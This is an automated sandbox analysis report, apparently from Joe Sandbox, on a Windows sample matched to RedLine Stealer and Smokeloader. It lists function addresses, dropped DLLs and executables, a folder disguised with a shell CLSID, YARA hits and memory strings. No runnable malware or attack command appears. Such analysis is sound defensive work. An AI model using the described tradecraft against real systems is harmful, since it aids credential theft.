Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C84B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C84B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C7EF280

Contains functionality to launch a process as a different user

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

23_2_00007FFDA38CF0FE

Deletes files inside the Windows folder

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File deleted: C:\Windows\Temp\1kuzcKGx

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041BD50	0_2_0041BD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A130	0_2_0041A130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00419B58	0_2_00419B58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00419B30	0_2_00419B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E35A0	0_2_6C7E35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8434A0	0_2_6C8434A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84C4A0	0_2_6C84C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F5440	0_2_6C7F5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80D4D0	0_2_6C80D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C826CF0	0_2_6C826CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85AC00	0_2_6C85AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C825C10	0_2_6C825C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C832C10	0_2_6C832C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7ED4E0	0_2_6C7ED4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85542B	0_2_6C85542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F64C0	0_2_6C7F64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85545C	0_2_6C85545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F6C80	0_2_6C7F6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820DD0	0_2_6C820DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8485F0	0_2_6C8485F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FFD00	0_2_6C7FFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80ED10	0_2_6C80ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C810512	0_2_6C810512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84E680	0_2_6C84E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EC670	0_2_6C7EC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C805E90	0_2_6C805E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C844EA0	0_2_6C844EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8576E3	0_2_6C8576E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C835600	0_2_6C835600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EBEF0	0_2_6C7EBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FFEF0	0_2_6C7FFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C827E10	0_2_6C827E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C849E30	0_2_6C849E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804640	0_2_6C804640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C832E4E	0_2_6C832E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C809E50	0_2_6C809E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C823E50	0_2_6C823E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C856E63	0_2_6C856E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8377A0	0_2_6C8377A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C816FF0	0_2_6C816FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F9F00	0_2_6C7F9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C827710	0_2_6C827710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EDFE0	0_2_6C7EDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8160A0	0_2_6C8160A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8550C7	0_2_6C8550C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80C0E0	0_2_6C80C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8258E0	0_2_6C8258E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F7810	0_2_6C7F7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82B820	0_2_6C82B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C834820	0_2_6C834820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C808850	0_2_6C808850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80D850	0_2_6C80D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82F070	0_2_6C82F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C825190	0_2_6C825190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C842990	0_2_6C842990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FD960	0_2_6C7FD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81D9B0	0_2_6C81D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A940	0_2_6C80A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EC9A0	0_2_6C7EC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83B970	0_2_6C83B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85B170	0_2_6C85B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85BA90	0_2_6C85BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C814AA0	0_2_6C814AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C852AB0	0_2_6C852AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C828AC0	0_2_6C828AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C801AF0	0_2_6C801AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82E2F0	0_2_6C82E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FCAB0	0_2_6C7FCAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E22A0	0_2_6C7E22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C829A60	0_2_6C829A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FC370	0_2_6C7FC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E5340	0_2_6C7E5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8553C8	0_2_6C8553C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82D320	0_2_6C82D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EF380	0_2_6C7EF380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C88ECC0	0_2_6C88ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8EECD0	0_2_6C8EECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C956C00	0_2_6C956C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96AC30	0_2_6C96AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89AC60	0_2_6C89AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C926D90	0_2_6C926D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C894DB0	0_2_6C894DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA1CDC0	0_2_6CA1CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA18D20	0_2_6CA18D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BAD50	0_2_6C9BAD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95ED70	0_2_6C95ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C916E90	0_2_6C916E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89AEC0	0_2_6C89AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C930EC0	0_2_6C930EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C970E20	0_2_6C970E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C92EE70	0_2_6C92EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D8FB0	0_2_6C9D8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89EFB0	0_2_6C89EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96EFF0	0_2_6C96EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C890FE0	0_2_6C890FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C896F10	0_2_6C896F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0F20	0_2_6C9D0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8FEF40	0_2_6C8FEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C952F70	0_2_6C952F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9968E0	0_2_6C9968E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8E0820	0_2_6C8E0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C91A820	0_2_6C91A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C964840	0_2_6C964840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9509B0	0_2_6C9509B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9209A0	0_2_6C9209A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C94A9A0	0_2_6C94A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9AC9E0	0_2_6C9AC9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C49F0	0_2_6C8C49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8E6900	0_2_6C8E6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C8960	0_2_6C8C8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C90EA80	0_2_6C90EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C93EA00	0_2_6C93EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C948A30	0_2_6C948A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C90CA70	0_2_6C90CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C930BA0	0_2_6C930BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C996BE0	0_2_6C996BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BA480	0_2_6C9BA480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C92A4D0	0_2_6C92A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8D64D0	0_2_6C8D64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C91A430	0_2_6C91A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8F4420	0_2_6C8F4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8A8460	0_2_6C8A8460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8845B0	0_2_6C8845B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C91E5F0	0_2_6C91E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95A5E0	0_2_6C95A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D8550	0_2_6C9D8550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8E8540	0_2_6C8E8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C994540	0_2_6C994540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C930570	0_2_6C930570
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03327B92	6_2_03327B92
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03336BCE	6_2_03336BCE
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03324962	6_2_03324962
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03325956	6_2_03325956
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_0332C95A	6_2_0332C95A
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_033298AA	6_2_033298AA
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03334F9A	6_2_03334F9A
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03325EE6	6_2_03325EE6
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_0333CCD2	6_2_0333CCD2
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF62094C490	23_2_00007FF62094C490
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38A08D0	23_2_00007FFDA38A08D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D2520	23_2_00007FFDA38D2520
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0AEFB0	23_2_00007FFDAC0AEFB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0DCB60	23_2_00007FFDAC0DCB60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0FEAF0	23_2_00007FFDAC0FEAF0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC1063E7	23_2_00007FFDAC1063E7
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC1304B0	23_2_00007FFDAC1304B0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC128D2B	23_2_00007FFDAC128D2B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC128E16	23_2_00007FFDAC128E16
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC128F5E	23_2_00007FFDAC128F5E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC12904C	23_2_00007FFDAC12904C

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Enables security privileges

Source: C:\Windows\System32\icacls.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8B9B10 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA109D0 appears 140 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C81CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA1DAE0 appears 34 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00402000 appears 287 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8294D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8B3620 appears 35 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC0F1352 appears 398 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FF620942EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC0D20C2 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA38940D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA38CC852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC0A9DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC1277A2 appears 388 times

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012

PE file contains more sections than normal

Source: 1kuzcKGx.23.dr	Static PE information: Number of sections : 11 > 10
Source: KXEmxT2p.23.dr	Static PE information: Number of sections : 11 > 10
Source: Lx9RtFcl.23.dr	Static PE information: Number of sections : 11 > 10
Source: S7evpAMe.23.dr	Static PE information: Number of sections : 11 > 10
Source: samctl.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: g29qQU9G.23.dr	Static PE information: Number of sections : 11 > 10
Source: evtsrv.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: h0yu5TYE.23.dr	Static PE information: Number of sections : 11 > 10
Source: BFCAAEHJDB.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: FHLBnhuN.23.dr	Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: 7847438767[1].exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: fJw4qvYl.23.dr	Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.23.dr	Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2788213145.000000006C872000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2761930657.0000000002461000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2788685435.000000006CA65000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.2762173907.000000000249D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/76@2/35

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C847030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C847030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,

0_2_00411400

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00410900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

0_2_00410900

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620942029 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,

23_2_00007FF620942029

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF620941DBC

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF620941DBC

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199747278259[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5012
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess1524
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03

Source: C:\ProgramData\BFCAAEHJDB.exe

File created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340604993.000000001B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
